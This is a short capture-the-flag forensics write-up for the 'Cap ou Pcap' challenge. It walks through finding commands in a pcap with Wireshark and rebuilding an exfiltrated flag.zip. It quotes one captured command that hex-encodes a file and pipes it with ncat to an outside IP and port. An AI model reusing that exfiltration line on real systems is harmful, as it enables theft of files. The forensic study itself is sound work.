Writeup by NiveusEmi for Cap ou Pcap

intro forensics network

January 2, 2025

Download the attached file cap.pcap
To resolve this challenge, I used Wireshark
Open the downloaded file with Wireshark
While parsing packets, we can find some commands
Continue parsing the packets until you find interesting commands and returns:

ls Documents wich returns flag.zip
[…] and after
xxd -p Documents/flag.zip | tr -d '\n' | ncat 172.20.20.133 20200 wich returns the file content as bytes

You can export the packet bytes into a zip file
Unzip it
The flag is located into the file flag.txt

The API returned an error.

The API returned an error: please ensure that you did not already sent a writeup for this challenge.

Challenge flag is correct, nice play!

Challenge flag is incorrect.

You need to provide a valid GitHub Gist URL.

Writeup successfully submitted, thank you!